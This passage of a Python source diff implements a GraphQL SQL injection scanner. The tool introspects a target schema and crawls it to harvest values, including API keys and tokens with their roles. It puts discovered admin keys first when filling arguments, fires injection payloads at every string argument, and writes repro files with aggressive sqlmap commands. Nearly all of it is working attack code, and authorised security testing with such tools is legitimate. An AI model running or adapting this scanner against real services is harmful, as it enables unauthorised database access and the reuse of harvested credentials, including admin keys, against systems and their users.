{{ {selection} }} }}' + else: + q = f'query {{ {field_name} }}' + return {"query": q} + +def _sanitize_name(s: str) -> str: + return re.sub(r"[^\w\-]+", "_", s)[:64] + +def _write_raw_http(endpoint: str, headers: Dict[str, str], body_json: Dict[str, Any], fname: str) -> str: + repo_root = Path.cwd() + repro_dir = repo_root / REPRO_DIR + repro_dir.mkdir(parents=True, exist_ok=True) + parsed = urlparse(endpoint) + path = parsed.path or "/" + if parsed.query: + path = path + "?" 
+ parsed.query + host_header = parsed.netloc + hdrs = {} + hdrs["Host"] = host_header + for k, v in (headers or {}).items(): + if k.lower() == "host": + hdrs["Host"] = v + else: + hdrs[k] = v + if not any(k.lower() == "content-type" for k in hdrs): + hdrs["Content-Type"] = "application/json" + body_str = json.dumps(body_json, ensure_ascii=False) + fpath = repro_dir / fname + lines = [] + lines.append(f"POST {path} HTTP/1.1") + for k, v in hdrs.items(): + lines.append(f"{k}: {v}") + lines.append("") + lines.append(body_str) + content = "\r\n".join(lines) + "\r\n" + with open(fpath, "w", encoding="utf-8") as fh: + fh.write(content) + return str(fpath) + +def _read_index() -> Dict[str, Any]: + idx_path = Path(REPRO_DIR) / INDEX_FILE + if not idx_path.exists(): + return {} + try: + with open(idx_path, "r", encoding="utf-8") as fh: + return json.load(fh) + except Exception: + return {} + +def _write_index(idx: Dict[str, Any]) -> None: + idx_path = Path(REPRO_DIR) + idx_path.mkdir(parents=True, exist_ok=True) + with open(idx_path / INDEX_FILE, "w", encoding="utf-8") as fh: + json.dump(idx, fh, ensure_ascii=False, indent=2) + +# -------------------- Crawling / extraction -------------------------------- + +def seed_field_queries(field: Dict[str, Any], types: List[Dict[str, Any]], page_sizes: List[int], max_items: int) -> List[str]: + fname = field.get("name") + return_type_name = extract_named_type(field.get("type")) + ret_def = find_type_definition(types, return_type_name) + scalars = [] + if ret_def and ret_def.get("fields"): + for f in ret_def.get("fields", [])[:20]: + fname_f = f.get("name") + if fname_f and not fname_f.startswith("__"): + scalars.append(fname_f) + if not scalars: + scalars = ["__typename"] + selection = " ".join(scalars[:8]) + queries = [] + queries.append(f'query {{ {fname} {{ {selection} }} }}') + for n in page_sizes: + queries.append(f'query {{ {fname}(first: {n}) {{ edges {{ node {{ {selection} }} }} }} }}') + for n in page_sizes: + queries.append(f'query {{ {fname}(first: {n}) {{ {selection} }} }}') + return queries + +def get_field_from_response(resp_data: Any, field_name: str) -> Any: + if not resp_data: + return None + if isinstance(resp_data, dict): + if "data" in resp_data and isinstance(resp_data["data"], dict): + return resp_data["data"].get(field_name) + if field_name in resp_data: + return resp_data.get(field_name) + return None + +def _pretty_print_extracted_values(extracted_values: Dict[str, Set[str]], key_roles: Dict[str, str], max_per_key: int = 6): + if not extracted_values and not key_roles: + print(Fore.YELLOW + "[*] No extracted values found.") + return + print(Fore.CYAN + "[*] Extracted values (sample):") + if key_roles: + print(Fore.MAGENTA + " Key -> role mappings:") + for k, r in list(key_roles.items())[:10]: + print(Fore.MAGENTA + f" {k} -> {r}") + if extracted_values: + print(Fore.CYAN + " Field -> values:") + for key in sorted(extracted_values.keys()): + vals = list(extracted_values[key]) + sample = vals[:max_per_key] + print(Fore.CYAN + f" {key}: " + Fore.WHITE + f"{json.dumps(sample, ensure_ascii=False)}" + Style.RESET_ALL) + +def try_decode_global_id(val: str) -> Optional[Tuple[str, str]]: + if not isinstance(val, str): + return None + if len(val) < 8: + return None + if not re.fullmatch(r'[A-Za-z0-9+/=]+', val): + return None + try: + decoded = base64.b64decode(val + '===').decode('utf-8', errors='ignore') + except Exception: + return None + if ':' in decoded: + parts = decoded.split(':', 1) + return parts[0].strip(), parts[1].strip() + 
return None + +def simple_name_match_values(arg_name: str, extracted_values: Dict[str, Set[str]]) -> List[str]: + an = (arg_name or "").lower() + if an in extracted_values: + return list(extracted_values[an])[:5] + candidates = [] + for k, vals in extracted_values.items(): + kn = k.lower() + if an in kn or kn in an: + candidates.extend(list(vals)[:3]) + if 'key' in an and 'key' in extracted_values: + candidates = list(extracted_values['key'])[:5] + candidates + if 'token' in an and 'token' in extracted_values: + candidates = list(extracted_values['token'])[:5] + candidates + seen = set() + res = [] + for v in candidates: + if v not in seen: + res.append(v) + seen.add(v) + if len(res) >= 5: + break + return res + +def crawl_and_extract_values(endpoint: str, + headers: Dict[str, str], + query_fields: List[Dict[str, Any]], + types: List[Dict[str, Any]], + max_depth: int = 2, + max_requests: int = 250, + max_items_per_list: int = 10, + delay: float = 0.0, + verbose: bool = False) -> Tuple[Dict[str, Set[str]], Dict[str, str]]: + """ + Crawl simple query fields to extract string values to reuse as candidates for arguments. + Returns (extracted_values, key_roles). + """ + print(Fore.CYAN + "[*] Crawling schema to extract values for candidate inputs...") + extracted_values: Dict[str, Set[str]] = {} + key_roles: Dict[str, str] = {} + requests_made = 0 + visited: Set[Tuple[str, str]] = set() + page_sizes = [10, 50, 100] + + def collect(obj: Any, prefix: Optional[str] = None): + if isinstance(obj, dict): + if 'edges' in obj and isinstance(obj['edges'], list): + for e in obj['edges'][:max_items_per_list]: + if isinstance(e, dict) and 'node' in e: + collect(e['node'], prefix) + return + for k, v in obj.items(): + if k.startswith("__"): + continue + if isinstance(v, str) and v: + extracted_values.setdefault(k, set()).add(v) + elif isinstance(v, list): + for it in v[:max_items_per_list]: + collect(it, prefix=k) + elif isinstance(v, dict): + collect(v, prefix=k) + elif isinstance(obj, list): + for it in obj[:max_items_per_list]: + collect(it, prefix=prefix) + + for field in query_fields: + if requests_made >= max_requests: + break + fname = field.get("name") + if not fname or fname.startswith("__"): + continue + args = field.get("args") or [] + if args: + continue + qlist = seed_field_queries(field, types, page_sizes, max_items_per_list) + for q in qlist: + if requests_made >= max_requests: + break + if verbose: + print(Fore.BLUE + "[>] Seed query: " + truncate_str(q, 800)) + resp = post_graphql(endpoint, headers, {"query": q}, verbose=verbose) + requests_made += 1 + rdata = get_field_from_response(resp.get("data"), fname) + if rdata: + collect(rdata) + if isinstance(rdata, list): + for it in rdata[:max_items_per_list]: + if isinstance(it, dict): + key = it.get("key") or it.get("apiKey") or it.get("token") + role = it.get("role") + if key and role: + key_roles[key] = role + elif isinstance(rdata, dict): + key = rdata.get("key") or rdata.get("apiKey") or rdata.get("token") + role = rdata.get("role") + if key and role: + key_roles[key] = role + if delay and requests_made < max_requests: + time.sleep(delay) + + # decode base64/global IDs to numeric ids + added_decoded = 0 + for key, vals in list(extracted_values.items()): + for v in list(vals)[:200]: + d = try_decode_global_id(v) + if d: + typ, idv = d + extracted_values.setdefault("id", set()).add(idv) + extracted_values.setdefault(f"{typ.lower()}Id", set()).add(idv) + added_decoded += 1 + if added_decoded: + print(Fore.GREEN + f"[+] Decoded {added_decoded} 
global/base64 id(s)") + + # follow-up BFS using id-like args + depth = 0 + while depth < max_depth and requests_made < max_requests: + progress = False + id_candidates: List[str] = [] + if "id" in extracted_values: + id_candidates.extend(list(extracted_values["id"])) + for k in list(extracted_values.keys()): + if k.lower().endswith("id") and k.lower() != "id": + id_candidates.extend(list(extracted_values[k])[:50]) + for k, vals in extracted_values.items(): + for v in list(vals)[:50]: + if try_decode_global_id(v): + id_candidates.append(v) + id_candidates = list(dict.fromkeys(id_candidates))[:500] + + for field in query_fields: + if requests_made >= max_requests: + break + fname = field.get("name") + if not fname or fname.startswith("__"): + continue + args = field.get("args") or [] + if not args: + continue + id_arg_names = [a.get("name") for a in args if a.get("name") and 'id' in a.get("name").lower()] + if not id_arg_names: + continue + candidates_per_arg = [] + for an in id_arg_names: + vals = list(extracted_values.get(an, []))[:6] + if not vals: + vals = id_candidates[:6] + if not vals: + vals = ["1"] + candidates_per_arg.append(vals) + combos = [] + for prod in product(*candidates_per_arg): + args_dict = {id_arg_names[i]: prod[i] for i in range(len(id_arg_names))} + ahash = hashlib.sha1(json.dumps({"f": fname, "args": args_dict}, sort_keys=True).encode()).hexdigest() + if (fname, ahash) in visited: + continue + combos.append((args_dict, ahash)) + if len(combos) >= 6: + break + for args_dict, ahash in combos: + if requests_made >= max_requests: + break + visited.add((fname, ahash)) + return_type_name = extract_named_type(field.get("type")) + ret_def = find_type_definition(types, return_type_name) + sel = None + if ret_def and ret_def.get("fields"): + sel = pick_scalar_field_for_type(ret_def, types) or (ret_def.get("fields")[0].get("name")) + q = build_query(fname, args_dict, sel) + q_str = q.get("query") if isinstance(q, dict) else str(q) + if verbose: + print(Fore.BLUE + "[>] Follow query: " + truncate_str(q_str, 800)) + resp = post_graphql(endpoint, headers, {"query": q_str}, verbose=verbose) + requests_made += 1 + progress = True + rdata = get_field_from_response(resp.get("data"), fname) + if rdata: + collect(rdata) + if isinstance(rdata, list): + for it in rdata[:max_items_per_list]: + if isinstance(it, dict): + key = it.get("key") or it.get("apiKey") or it.get("token") + role = it.get("role") + if key and role: + key_roles[key] = role + elif isinstance(rdata, dict): + key = rdata.get("key") or rdata.get("apiKey") or rdata.get("token") + role = rdata.get("role") + if key and role: + key_roles[key] = role + if delay and requests_made < max_requests: + time.sleep(delay) + if not progress: + break + new_decoded = 0 + for key, vals in list(extracted_values.items()): + for v in list(vals)[:200]: + d = try_decode_global_id(v) + if d: + typ, idv = d + if idv not in extracted_values.get("id", set()): + extracted_values.setdefault("id", set()).add(idv) + extracted_values.setdefault(f"{typ.lower()}Id", set()).add(idv) + new_decoded += 1 + if new_decoded: + print(Fore.GREEN + f"[+] Decoded {new_decoded} additional global/base64 id(s)") + depth += 1 + + total_vals = sum(len(v) for v in extracted_values.values()) + if total_vals: + print(Fore.GREEN + f"[+] Crawled and extracted {total_vals} values from {len(extracted_values)} distinct keys (requests made: {requests_made})") + if key_roles: + print(Fore.GREEN + f"[+] Found {len(key_roles)} key->role mappings during crawl") + 
_pretty_print_extracted_values(extracted_values, key_roles) + return extracted_values, key_roles + +# -------------------- Grouping & printing (left-aligned compact) ----------- + +def group_findings_by_param(findings: List[Dict[str, Any]], endpoint: str) -> Dict[str, Any]: + grouped: Dict[str, Any] = {} + for f in findings: + param = f.get("arg") or "unknown" + field = f.get("field") or "" + args_context = dict(f.get("args_used") or {}) + args_context.pop(param, None) + payload = f.get("payload") + evidence_type = f.get("type") or "" + evidence_text = f.get("evidence") or "" + repro = f.get("repro") or "" + recommended_cmd = f.get("recommended_cmd") or (_build_sqlmap_cmd_marker(repro) if repro else "") + timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ") + confidence = compute_confidence(evidence_type, payload or "", bool(repro)) + occ_list = grouped.setdefault(param, {"occurrences": {}, "aggregate": {}}) + occ_key = f"{field} @ {endpoint}" + occ = occ_list["occurrences"].setdefault(occ_key, {"field": field, "endpoint": endpoint, "args_context": args_context, "findings": []}) + occ["findings"].append({ + "payload": payload, + "evidence_type": evidence_type, + "evidence": evidence_text, + "attack_response": truncate_str(str(f.get("attack_response")), 1000), + "base_response": truncate_str(str(f.get("base_response")), 1000), + "repro": repro, + "recommended_cmd": recommended_cmd, + "timestamp": timestamp, + "confidence": confidence, + "args_used": f.get("args_used") + }) + for param, data in list(grouped.items()): + occs = [] + all_payloads = set() + max_conf = 0.0 + for k, v in data["occurrences"].items(): + occs.append(v) + for fin in v.get("findings", []): + all_payloads.add(fin.get("payload")) + if fin.get("confidence", 0) > max_conf: + max_conf = fin.get("confidence", 0) + severity = "high" if max_conf >= 0.9 else "low" + data["occurrences"] = occs + data["aggregate"] = { + "unique_payloads": len(all_payloads), + "total_evidences": sum(len(o.get("findings", [])) for o in occs), + "max_confidence": max_conf, + "fields_affected": len(occs), + "severity": severity, + "notes": "" + } + return grouped + +def print_grouped_summary(grouped: Dict[str, Any]): + """ + Left-aligned compact printing: + - header: [n] (param in red; no occurrence line) + - Slight indentation for Payload / Evidence lines. + - Payload label in yellow, Evidence label in blue. + - Recommended sqlmap command label in magenta, printed with NO extra indentation. + """ + if not grouped: + return + + params = sorted(grouped.items(), key=lambda kv: (0 if kv[1].get("aggregate", {}).get("severity") == "high" else 1, kv[0])) + print(Fore.MAGENTA + "\n[*] Findings grouped by vulnerable parameter:\n") + + for idx, (param, data) in enumerate(params, start=1): + # header left aligned, param in red + print(f"[{idx}] {Fore.RED}{param}{Style.RESET_ALL}") + + for occ in data.get("occurrences", []): + # omit printing " @ (context args: ...)" + + for fin in occ.get("findings", []): + payload = fin.get("payload") + payload_display = payload if payload is not None else json.dumps(fin.get("args_used") or {}, ensure_ascii=False) + # slight indent for payload/evidence + print(" " + Fore.YELLOW + "Payload: " + Style.RESET_ALL + f"{payload_display}") + + evidence = fin.get("evidence") or "" + cleaned = re.sub(r"\s+", " ", evidence).strip() + cleaned = re.sub(r"\[SQL: .*", "[SQL TRACE]", cleaned, flags=re.S) + if len(cleaned) > EVIDENCE_MAX_CHARS: + cleaned = cleaned[:EVIDENCE_MAX_CHARS - 3].rstrip() + "..." 
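+ # If the raw evidence carried a "[SQL TRACE]" tag that truncation removed from the cleaned text, re-append it so the hint stays visible.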
+ if re.search(r"\[SQL TRACE\]", evidence, flags=re.I) and "[SQL TRACE]" not in cleaned: + cleaned = cleaned + " [SQL TRACE]" + print(" " + Fore.BLUE + "Evidence: " + Style.RESET_ALL + cleaned) + print("") # blank line between findings + + # Recommended sqlmap command label in magenta, no indentation + first_repro = None + first_cmd = None + for fin in occ.get("findings", []): + if fin.get("repro"): + first_repro = fin.get("repro") + first_cmd = fin.get("recommended_cmd") or _build_sqlmap_cmd_marker(first_repro) + break + if first_repro: + print(Fore.MAGENTA + "Recommended sqlmap command:" + Style.RESET_ALL) + print(Fore.MAGENTA + f"{first_cmd}" + Style.RESET_ALL) + print("") # blank line between occurrences + +# -------------------- Detection flow (markers, checks) --------------------- + +def _canonical_marker_key(endpoint: str, field: str, arg: str, context_args: Dict[str, Any]) -> str: + parts = [endpoint, field, arg] + arg_names = sorted(list(context_args.keys())) if isinstance(context_args, dict) else [] + parts.append(",".join(arg_names)) + return "|".join(parts) + +def write_or_update_marker(endpoint: str, headers: Dict[str, str], attack_query: str, + field: str, arg: str, payload: str, + context_args: Dict[str, Any], + evidence_type: Optional[str], evidence_text: Optional[str]) -> str: + try: + escaped_payload = json.dumps(payload) + except Exception: + escaped_payload = payload + escaped_marker = json.dumps("*") + if escaped_payload in attack_query: + marker_query = attack_query.replace(escaped_payload, escaped_marker, 1) + elif payload in attack_query: + marker_query = attack_query.replace(payload, "*", 1) + else: + marker_query = attack_query.replace("\\" + payload, escaped_marker, 1) + + canonical = _canonical_marker_key(endpoint, field, arg, context_args or {}) + short_hash = hashlib.sha1(canonical.encode("utf-8")).hexdigest()[:8] + filename = f"{_sanitize_name(field)}_{_sanitize_name(arg)}_{short_hash}_marker.http" + + repro_dir = Path(REPRO_DIR) + repro_dir.mkdir(parents=True, exist_ok=True) + marker_path = repro_dir / filename + + if not marker_path.exists(): + body = {"query": marker_query} + _write_raw_http(endpoint, headers, body, filename) + + idx = _read_index() + entry = idx.get(filename) or { + "endpoint": endpoint, + "field": field, + "arg": arg, + "context_arg_names": sorted(list((context_args or {}).keys())), + "evidences": [] + } + + ts = datetime.now(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ") + repro_rel = str(marker_path) + recommended_cmd = f"sqlmap --level 5 --risk 3 -r '{repro_rel}' -p \"JSON[query]\" --batch --skip-urlencode --random-agent" + + evidence_record = { + "payload": payload, + "evidence_type": evidence_type or "", + "evidence": evidence_text or "", + "timestamp": ts, + "repro": repro_rel, + "recommended_cmd": recommended_cmd + } + + exists = any(e.get("payload") == payload and e.get("evidence") == evidence_text for e in entry.get("evidences", [])) + if not exists: + entry.setdefault("evidences", []).append(evidence_record) + idx[filename] = entry + _write_index(idx) + return str(marker_path) + +def _build_sqlmap_cmd_marker(repro_marker_path: str) -> str: + return f"sqlmap --level 5 --risk 3 -r '{repro_marker_path}' -p \"JSON[query]\" --batch --skip-urlencode --parse-errors --random-agent" + +def check_sql_error_in_response(resp_data: Dict[str, Any]) -> Optional[Dict[str, str]]: + if not resp_data: + return None + errors = resp_data.get("errors") + if not errors: + return None + for e in errors: + msg = str(e.get("message", "")) + for rx in 
SQL_ERROR_SIGS: + if rx.search(msg): + return {"evidence": msg, "pattern": rx.pattern} + return None + +def detect_missing_required_arg(resp_data: Dict[str, Any]) -> Optional[str]: + if not resp_data: + return None + errors = resp_data.get("errors") or [] + for e in errors: + msg = str(e.get("message", "")) + m = re.search(r'argument\s+"([^"]+)"[^.]*required but not provided', msg, re.I) + if m: + return m.group(1) + return None + +def detect_graphql_syntax_error(resp_data: Dict[str, Any]) -> Optional[str]: + if not resp_data: + return None + errors = resp_data.get("errors") or [] + for e in errors: + msg = str(e.get("message", "")) + if re.search(r"Syntax Error GraphQL|Syntax Error|Unexpected character|Expected :, found", msg, re.I): + return msg + return None + +def compute_confidence(evidence_type: str, payload: str, has_repro: bool) -> float: + weights = { + "SQL_ERROR": 0.6, + "SQL_ERROR_IN_RESPONSE": 0.6, + "SQL_ERROR_IN_RESPONSE_SIMPLE": 0.6, + "RESPONSE_DIFF": 0.2, + "RESPONSE_DIFF_SIMPLE": 0.1, + "NULL_ON_ATTACK": 0.15, + } + base = weights.get(evidence_type, 0.1) + payload_bonus = 0.0 + if payload and re.search(r"(\bOR\b|\bUNION\b|--|/\*|')", payload, re.I): + payload_bonus = 0.1 + repro_bonus = 0.15 if has_repro else 0.0 + score = base + payload_bonus + repro_bonus + if score > 0.99: + score = 0.99 + return round(score, 2) + +# -------------------- Main detection logic -------------------------------- + +def run_detector(endpoint: str, headers: Dict[str, str], crawl: bool = False, + crawl_depth: int = 2, max_requests: int = 250, max_items: int = 10, + crawl_delay: float = 0.0, verbose: bool = False) -> List[Dict[str, Any]]: + + print(Fore.CYAN + f"[*] Running introspection on {endpoint}") + intros = post_graphql(endpoint, headers, {"query": INTROSPECTION_QUERY}, verbose=verbose) + schema = None + try: + schema = intros["data"]["data"]["__schema"] + except Exception: + print(Fore.RED + "[!] Failed to retrieve schema via introspection. Response:") + print(json.dumps(intros.get("data", {}), ensure_ascii=False, indent=2)) + return [] + + types = schema.get("types", []) + query_type = next((t for t in types if t.get("name") == "Query"), None) + if not query_type or not query_type.get("fields"): + print(Fore.RED + "[!] 
Query type or fields not found in schema.") + return [] + + query_fields = query_type.get("fields", []) + + if crawl: + extracted_values, key_roles = crawl_and_extract_values( + endpoint, headers, query_fields, types, + max_depth=crawl_depth, max_requests=max_requests, + max_items_per_list=max_items, delay=crawl_delay, verbose=verbose) + else: + extracted_values, key_roles = crawl_and_extract_values( + endpoint, headers, query_fields, types, + max_depth=1, max_requests=50, max_items_per_list=max_items, delay=crawl_delay, verbose=verbose) + + admin_keys = [k for k, r in key_roles.items() if isinstance(r, str) and 'admin' in r.lower()] + if admin_keys: + print(Fore.GREEN + f"[+] Prioritizing {len(admin_keys)} admin key(s) when filling key-like arguments") + + temp_findings: Dict[Tuple[str, str], List[Dict[str, Any]]] = {} + + for field in query_fields: + args = field.get("args", []) or [] + if not args: + continue + field_name = field.get("name") + if not field_name or field_name.startswith("__"): + continue + + string_args = [] + for arg in args: + arg_type_name = extract_named_type(arg.get("type")) + if is_string_type(arg_type_name): + string_args.append(arg) + if not string_args: + continue + + return_type_name = extract_named_type(field.get("type")) + return_type_def = find_type_definition(types, return_type_name) + selection = pick_scalar_field_for_type(return_type_def, types) + if not selection and return_type_def and return_type_def.get("fields"): + fallback = next((f for f in return_type_def["fields"] if f["name"] in ("id", "uuid", "username", "name", "title", "__typename")), None) + if fallback: + selection = fallback["name"] + if not selection: + selection = "__typename" + + base_values: Dict[str, List[str]] = {} + for arg in args: + an = arg.get("name") + ev = list(extracted_values.get(an, []))[:8] + if an and any(k in an.lower() for k in ("key", "apikey", "token")) and admin_keys: + deduped = [] + for k in admin_keys: + if k not in deduped: + deduped.append(k) + for v in ev: + if v not in deduped: + deduped.append(v) + ev = deduped[:8] + if verbose: + print(Fore.YELLOW + f"[>] Using prioritized admin keys for argument '{an}': {ev[:3]}") + if not ev: + ev = simple_name_match_values(an, extracted_values) + if ev: + base_values[an] = ev + else: + arg_type_name = extract_named_type(arg.get("type")) + base_values[an] = ["test", "admin", "test123"] if is_string_type(arg_type_name) else ["1", "100"] + + for target_arg in string_args: + target_arg_name = target_arg.get("name") + + other_args = [a.get("name") for a in args if a.get("name") != target_arg_name] + candidate_lists = [] + for oname in other_args: + vals = base_values.get(oname, ["test"]) + candidate_lists.append(sorted(vals, key=lambda x: len(str(x)), reverse=True)[:3]) + + combos_to_try: List[Dict[str, str]] = [] + if candidate_lists: + max_attempts = 6 + seen = 0 + for combo in product(*candidate_lists): + args_dict = {} + for idx, oname in enumerate(other_args): + args_dict[oname] = combo[idx] + args_dict[target_arg_name] = "test" + combos_to_try.append(args_dict) + seen += 1 + if seen >= max_attempts: + break + else: + combos_to_try.append({target_arg_name: "test"}) + + working_args: Optional[Dict[str, str]] = None + base_resp = None + base_norm = None + base_has_error = True + for attempt_args in combos_to_try: + base_payload = build_query(field_name, attempt_args, selection) + base_q = base_payload.get("query") if isinstance(base_payload, dict) else str(base_payload) + base_resp = post_graphql(endpoint, headers, 
{"query": base_q}, verbose=verbose) + base_norm = normalize_resp(base_resp.get("data")) + base_has_error = bool(base_resp.get("data", {}).get("errors")) + if not base_has_error: + working_args = attempt_args.copy() + print(Fore.GREEN + Style.DIM + f"[+] Baseline for {field_name}.{target_arg_name} works with args: {attempt_args}") + break + + if not working_args: + working_args = combos_to_try[0].copy() if combos_to_try else {target_arg_name: "test"} + print(Fore.YELLOW + Style.DIM + f"[!] No clean baseline found for {field_name}.{target_arg_name}, using best-effort baseline: {working_args}") + + simple_q_base = build_query(field_name, {**working_args, target_arg_name: "test"}, "__typename") + simple_q_str = simple_q_base.get("query") if isinstance(simple_q_base, dict) else str(simple_q_base) + simple_base_resp = post_graphql(endpoint, headers, {"query": simple_q_str}, verbose=verbose) + simple_base_norm = normalize_resp(simple_base_resp.get("data")) + simple_field_value = get_field_from_response(simple_base_resp.get("data"), field_name) + + for payload in PAYLOADS: + attack_args = working_args.copy() + attack_args[target_arg_name] = payload + attack_payload = build_query(field_name, attack_args, selection) + attack_q_str = attack_payload.get("query") if isinstance(attack_payload, dict) else str(attack_payload) + attack_resp = post_graphql(endpoint, headers, {"query": attack_q_str}, verbose=verbose) + + if detect_graphql_syntax_error(attack_resp.get("data")): + continue + + missing_arg = detect_missing_required_arg(attack_resp.get("data")) + if missing_arg: + candidate = None + if base_values.get(missing_arg): + candidate = base_values[missing_arg][0] + else: + matches = simple_name_match_values(missing_arg, extracted_values) + if matches: + candidate = matches[0] + if candidate: + attack_args[missing_arg] = candidate + attack_payload = build_query(field_name, attack_args, selection) + attack_q_str = attack_payload.get("query") if isinstance(attack_payload, dict) else str(attack_payload) + attack_resp = post_graphql(endpoint, headers, {"query": attack_q_str}, verbose=verbose) + if detect_graphql_syntax_error(attack_resp.get("data")): + continue + else: + continue + + sql_err = check_sql_error_in_response(attack_resp.get("data")) + attack_norm = normalize_resp(attack_resp.get("data")) + + key = (field_name, target_arg_name) + temp_findings.setdefault(key, []) + + if sql_err: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "SQL_ERROR", sql_err.get("evidence")) + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": attack_args.copy(), + "type": "SQL_ERROR", + "evidence": sql_err["evidence"], + "base_response": base_resp.get("data") if base_resp else None, + "attack_response": attack_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + continue + + if base_norm and attack_norm and base_norm != attack_norm and not base_has_error: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "RESPONSE_DIFF", "Baseline != Attack") + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": attack_args.copy(), + "type": 
"RESPONSE_DIFF", + "evidence": "Baseline != Attack", + "base_response": base_resp.get("data") if base_resp else None, + "attack_response": attack_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + continue + + if base_norm and attack_norm and ("null" in attack_norm) and ("null" not in base_norm): + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "NULL_ON_ATTACK", "Null returned on attack while baseline had data") + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": attack_args.copy(), + "type": "NULL_ON_ATTACK", + "evidence": "Null returned on attack while baseline had data", + "base_response": base_resp.get("data") if base_resp else None, + "attack_response": attack_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + continue + + if simple_field_value not in (None, {}, []) and simple_base_norm and attack_norm and simple_base_norm != attack_norm: + marker_path = write_or_update_marker( + endpoint, headers, attack_q_str, field_name, target_arg_name, payload, + {k: v for k, v in attack_args.items() if k != target_arg_name}, + "RESPONSE_DIFF_SIMPLE", "Simple baseline __typename differs from attack") + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": attack_args.copy(), + "type": "RESPONSE_DIFF_SIMPLE", + "evidence": "Simple baseline __typename differs from attack", + "base_response": simple_base_resp.get("data"), + "attack_response": attack_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + continue + + # fallback simple checks + for payload in PAYLOADS: + simple_attack_q = build_query(field_name, {target_arg_name: payload}, "__typename") + simple_q_str = simple_attack_q.get("query") if isinstance(simple_attack_q, dict) else str(simple_attack_q) + simple_atk_resp = post_graphql(endpoint, headers, {"query": simple_q_str}, verbose=verbose) + + missing_arg = detect_missing_required_arg(simple_atk_resp.get("data")) + if missing_arg: + candidate = None + if base_values.get(missing_arg): + candidate = base_values[missing_arg][0] + else: + matches = simple_name_match_values(missing_arg, extracted_values) + if matches: + candidate = matches[0] + if candidate: + simple_attack_q = build_query(field_name, {target_arg_name: payload, missing_arg: candidate}, "__typename") + simple_q_str = simple_attack_q.get("query") if isinstance(simple_attack_q, dict) else str(simple_attack_q) + simple_atk_resp = post_graphql(endpoint, headers, {"query": simple_q_str}, verbose=verbose) + else: + continue + + if detect_graphql_syntax_error(simple_atk_resp.get("data")): + continue + + sa_norm = normalize_resp(simple_atk_resp.get("data")) + sa_err = check_sql_error_in_response(simple_atk_resp.get("data")) + + key = (field_name, target_arg_name) + temp_findings.setdefault(key, []) + + if sa_err: + marker_path = write_or_update_marker( + endpoint, headers, simple_q_str, field_name, target_arg_name, payload, {}, "SQL_ERROR", sa_err.get("evidence")) + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": {target_arg_name: payload}, + "type": "SQL_ERROR_IN_RESPONSE_SIMPLE", + "evidence": sa_err["evidence"], + 
"base_response": simple_base_resp.get("data"), + "attack_response": simple_atk_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + break + + if simple_field_value not in (None, {}, []) and simple_base_norm and sa_norm and simple_base_norm != sa_norm: + marker_path = write_or_update_marker( + endpoint, headers, simple_q_str, field_name, target_arg_name, payload, {}, "RESPONSE_DIFF_SIMPLE", "Simple baseline __typename differs from attack") + cmd = _build_sqlmap_cmd_marker(marker_path) + temp_findings[key].append({ + "field": field_name, + "arg": target_arg_name, + "payload": payload, + "args_used": {target_arg_name: payload}, + "type": "RESPONSE_DIFF_SIMPLE", + "evidence": "Simple baseline __typename differs from attack", + "base_response": simple_base_resp.get("data"), + "attack_response": simple_atk_resp.get("data"), + "recommended_cmd": cmd, + "repro": marker_path, + }) + break + + # finalize with confirmation rules + final_findings: List[Dict[str, Any]] = [] + for (field_name, arg_name), items in temp_findings.items(): + all_attack_null = True + for it in items: + atk = it.get("attack_response") + if isinstance(atk, dict): + val = None + try: + if isinstance(atk.get("data"), dict): + val = atk.get("data", {}).get(field_name) + else: + val = atk.get(field_name) + except Exception: + val = None + if val not in (None, {}, []): + all_attack_null = False + break + else: + all_attack_null = False + break + if all_attack_null and not any(i.get("type", "").startswith("SQL_ERROR") for i in items): + continue + + types_present = set(i.get("type") for i in items) + payloads_present = set(i.get("payload") for i in items) + has_sql_err = any(i.get("type", "").startswith("SQL_ERROR") for i in items) + has_null_on_attack = any(i.get("type") == "NULL_ON_ATTACK" for i in items) + + if has_sql_err: + for i in items: + if i.get("type", "").startswith("SQL_ERROR"): + final_findings.append(i) + continue + + if len(payloads_present) >= 2: + seen_payloads = set() + for i in items: + p = i.get("payload") + if p not in seen_payloads: + final_findings.append(i) + seen_payloads.add(p) + continue + + if has_null_on_attack: + for i in items: + if i.get("type") == "NULL_ON_ATTACK": + final_findings.append(i) + continue + + if "RESPONSE_DIFF" in types_present and "RESPONSE_DIFF_SIMPLE" in types_present: + rep = next((i for i in items if i.get("type") in ("RESPONSE_DIFF", "RESPONSE_DIFF_SIMPLE")), None) + if rep: + final_findings.append(rep) + continue + + return final_findings + +# -------------------- CLI / main ------------------------------------------ + +def main(): + parser = argparse.ArgumentParser(description="GraphQL SQLi mini-detector (compact grouped output)") + parser.add_argument("endpoint", help="GraphQL endpoint URL") + parser.add_argument("headers", nargs="?", help="Optional headers JSON", default=None) + parser.add_argument("--crawl", action="store_true", help="Enable limited crawling to extract outputs and reuse them as inputs (opt-in)") + parser.add_argument("--crawl-depth", type=int, default=2, help="Max crawl depth (default: 2)") + parser.add_argument("--max-requests", type=int, default=250, help="Maximum number of requests allowed during crawling (default: 250)") + 